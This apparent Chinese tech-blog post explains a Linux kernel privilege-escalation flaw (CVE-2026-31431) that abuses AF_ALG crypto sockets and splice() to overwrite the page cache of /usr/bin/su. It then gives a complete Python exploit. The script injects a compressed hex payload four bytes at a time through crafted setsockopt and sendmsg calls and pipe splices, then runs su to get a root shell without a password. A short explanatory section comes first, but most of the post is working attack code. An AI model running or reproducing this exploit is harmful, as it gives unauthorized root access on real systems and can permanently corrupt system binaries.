Linux内核AF_ALG与Splice越权漏洞(CVE-2026-31431)
2026-05-08 / 技术积累 / 16 次围观 / 0 次吐槽 /1. 漏洞概述
该脚本利用的是 Linux 内核在处理 页面缓存(Page Cache) 时的逻辑缺陷,结合了 AF_ALG(内核加密算法接口) 和 splice() 系统调用。
2. 核心技术
Page Cache(页面缓存):内核为了提高磁盘 I/O 效率,会将文件内容缓存在内存中。
AF_ALG (Address Family - Algorithm):Linux 内核 2.6.38 后引入的用户态接口,允许程序在用户态调用内核实现的加密算法。
splice() 系统调用:一种“零拷贝”技术,可以在两个文件描述符(FD)之间直接移动数据,而无需将数据拷贝到用户空间缓冲区。
3. 漏洞执行方案
脚本的执行过程可以分为以下四个关键阶段:
第一阶段:初始化与 Payload 准备
脚本首先打开目标 SUID 程序 /usr/bin/su。正常情况下,普通用户对该文件只有执行和读取权限,无法写入。
脚本随后通过 zlib 解压一段十六进制字符串。这段 Payload 通常是修改过的二进制代码,用于替换 su 内部的 setuid 检查逻辑。
第二阶段:建立内核通信链路 (AF_ALG)
脚本创建了一个 AF_ALG 类型的套接字,并绑定到 aead 加密算法。
关键点:通过
setsockopt设置精心构造的参数。这是为了在内核空间操纵内存布局,为后续的非法写入做铺垫。这步操作本质上是在寻找一个“写入口”,利用内核对加密缓冲区管理的不当来实现跨页面操作。
第三阶段:页面缓存污染 (Splice 注入)
这是攻击的“手术刀”部分:
创建管道 (Pipe):脚本创建一个匿名管道作为数据中转站。
第一次 Splice:将目标文件(
/usr/bin/su)的内容“拼接”到管道的写端。此时,目标文件的内存页面(Page Cache)被链接到了管道缓冲区。第二次 Splice:将管道读端的数据推送到
AF_ALG的 FD 中。由于内核在某些版本中未能正确检查管道缓冲区标志位(如PIPE_BUF_FLAG_CAN_MERGE),导致后续写入管道的数据会直接覆盖原本属于/usr/bin/su的页面缓存。
第四阶段:触发与提权
此时,物理硬盘上的 /usr/bin/su 虽然没变,但内存中的副本已被篡改。
脚本执行 os.system("su")。系统在运行 su 时会直接加载内存中那个被污染的副本。被污染后的 su 不再验证密码,直接赋予用户 Root 权限。
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import zlib
import socket
import ctypes
import struct
import binascii
import shutil
import sys
libc = ctypes.CDLL("libc.so.6", use_errno=True)
# 严格声明 C 函数签名,防止寄存器脏数据
libc.splice.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint]
libc.splice.restype = ctypes.c_ssize_t
libc.sendmsg.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_int]
libc.sendmsg.restype = ctypes.c_ssize_t
libc.bind.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_uint32]
libc.bind.restype = ctypes.c_int
libc.accept.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p]
libc.accept.restype = ctypes.c_int
AF_ALG = 38
SOL_ALG = 279
def hex_decode(hex_str):
return binascii.unhexlify(hex_str)
def c_splice(fd_in, off_in, fd_out, off_out, length, flags):
off_in_ptr = ctypes.byref(ctypes.c_longlong(off_in)) if off_in is not None else None
off_out_ptr = ctypes.byref(ctypes.c_longlong(off_out)) if off_out is not None else None
res = libc.splice(fd_in, off_in_ptr, fd_out, off_out_ptr, length, flags)
if res == -1:
errno = ctypes.get_errno()
raise OSError(errno, "Splice failed: " + os.strerror(errno))
return res
# 添加了 flags 参数
def c_sendmsg(fd, data, control_msgs, flags=0):
class iovec(ctypes.Structure):
_fields_ = [("iov_base", ctypes.c_void_p), ("iov_len", ctypes.c_size_t)]
class msghdr(ctypes.Structure):
_fields_ = [
("msg_name", ctypes.c_void_p),
("msg_namelen", ctypes.c_uint32),
("msg_iov", ctypes.POINTER(iovec)),
("msg_iovlen", ctypes.c_size_t),
("msg_control", ctypes.c_void_p),
("msg_controllen", ctypes.c_size_t),
("msg_flags", ctypes.c_int),
]
data_buf = ctypes.create_string_buffer(data)
iov = iovec(ctypes.cast(data_buf, ctypes.c_void_p), len(data))
def CMSG_ALIGN(length):
return (length + 7) & ~7
ctrl_buf = b""
for level, type_, cmsg_data in control_msgs:
cmsg_len = 16 + len(cmsg_data)
cmsg_space = CMSG_ALIGN(cmsg_len)
header = struct.pack("Qii", cmsg_len, level, type_)
pad_len = cmsg_space - cmsg_len
ctrl_buf += header + cmsg_data + (b'\x00' * pad_len)
ctrl_buffer = ctypes.create_string_buffer(ctrl_buf)
msg = msghdr()
msg.msg_name = None
msg.msg_namelen = 0
msg.msg_iov = ctypes.pointer(iov)
msg.msg_iovlen = 1
msg.msg_control = ctypes.cast(ctrl_buffer, ctypes.c_void_p)
msg.msg_controllen = len(ctrl_buf)
msg.msg_flags = 0
# 传入 flags (MSG_MORE)
res = libc.sendmsg(fd, ctypes.pointer(msg), flags)
if res == -1:
errno = ctypes.get_errno()
raise OSError(errno, "sendmsg failed: " + os.strerror(errno))
return res
def inject_chunk(target_fd, offset, chunk):
s = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
alg_type = b"aead"
alg_name = b"authencesn(hmac(sha256),cbc(aes))"
sockaddr_bin = struct.pack("H 14s I I 64s", AF_ALG, alg_type, 0, 0, alg_name)
if libc.bind(s.fileno(), sockaddr_bin, len(sockaddr_bin)) == -1:
raise OSError("AF_ALG Bind failed")
opt_data = hex_decode('0800010000000010' + '0' * 64)
s.setsockopt(SOL_ALG, 1, opt_data)
s.setsockopt(SOL_ALG, 5, b'\x00\x00\x00\x00')
if sys.version_info[0] == 2:
conn_fd = libc.accept(s.fileno(), None, None)
if conn_fd < 0:
err = ctypes.get_errno()
raise OSError(err, "libc.accept failed: " + os.strerror(err))
has_py_sock = False
else:
conn_sock, _ = s.accept()
conn_fd = conn_sock.fileno()
has_py_sock = True
try:
null_byte = hex_decode('00')
control_msgs = [
(SOL_ALG, 3, null_byte * 4),
(SOL_ALG, 2, b'\x10' + null_byte * 19),
(SOL_ALG, 4, b'\x08' + null_byte * 3),
]
payload_to_send = b"A" * 4 + chunk
# 关键:传 32768 (MSG_MORE)
if has_py_sock and hasattr(conn_sock, 'sendmsg'):
conn_sock.sendmsg([payload_to_send], control_msgs, 32768)
else:
c_sendmsg(conn_fd, payload_to_send, control_msgs, 32768)
p_read, p_write = os.pipe()
length = offset + 4
c_splice(target_fd, 0, p_write, None, length, 0)
c_splice(p_read, None, conn_fd, None, length, 0)
try:
os.read(conn_fd, 8 + offset)
except:
pass
os.close(p_read)
os.close(p_write)
finally:
if has_py_sock:
conn_sock.close()
else:
os.close(conn_fd)
finally:
s.close()
def main():
py_ver = sys.version_info[0]
print("[*] 正在启动漏洞研究脚本(Python %d)..." % py_ver)
target_path = "/usr/bin/su"
backup_path = "/tmp/su_backup.bak"
if not os.path.exists(target_path):
print("[-] 错误:目标文件不存在")
return
# ---------------------------------------------------------
# 安全备份逻辑
# ---------------------------------------------------------
print("[*] 正在备份目标文件,防止脏页回写导致系统损坏...")
try:
# 使用 copy2 尽量保留原始的文件元数据
shutil.copy2(target_path, backup_path)
print("[+] 备份成功,文件已保存至: %s" % backup_path)
except Exception as e:
print("[-] 备份失败: %s" % str(e))
print("[-] 出于安全考虑,已终止脚本执行。")
return
# ---------------------------------------------------------
hex_payload = "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
payload = zlib.decompress(hex_decode(hex_payload))
try:
target_fd = os.open(target_path, os.O_RDONLY)
except Exception as e:
print("[-] 无法读取目标文件: " + str(e))
return
print("[*] 注入开始,目标: %s (Payload 长度: %d 字节)" % (target_path, len(payload)))
for i in range(0, len(payload), 4):
chunk = payload[i:i+4]
try:
inject_chunk(target_fd, i, chunk)
print("[+] 注入进度: %d/%d" % (i + 4, len(payload)), end='\r')
except Exception as e:
print("\n[!] 偏移量 %d 处发生错误: %s" % (i, str(e)))
break
print("\n\n[*] 注入过程结束。")
# ---------------------------------------------------------
# 提权后恢复操作提示
# ---------------------------------------------------------
print("[!] 警告:由于内核脏页回写机制,磁盘上的 su 文件即将被永久破坏!")
print("[*] 提权成功获得 root Shell 后,请务必立即执行以下命令恢复环境:")
print("---------------------------------------------------------")
print(" cat %s > %s && chmod 4755 %s" % (backup_path, target_path, target_path))
print("---------------------------------------------------------")
print("[*] 正在尝试触发提权...")
# 执行 su 触发提权
os.system("su")
if __name__ == "__main__":
main()Powered By Cheug's Blog
Copyright Cheug Rights Reserved.
